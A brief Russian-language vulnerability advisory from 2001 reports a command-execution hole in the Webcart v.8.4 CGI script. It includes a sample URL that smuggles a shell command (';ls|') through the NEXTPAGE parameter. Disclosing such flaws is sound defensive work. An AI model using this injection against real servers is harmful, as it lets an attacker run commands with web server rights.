Очередная проблема в Webcart v.8.4

Дата публикации:
21.10.2001
Всего просмотров:
651
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Этот сценарий имеет уязвимость, которая позволяет выполнять команды с правами web сервера:

http://www.server.com/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD

или введите имя

CAPTCHA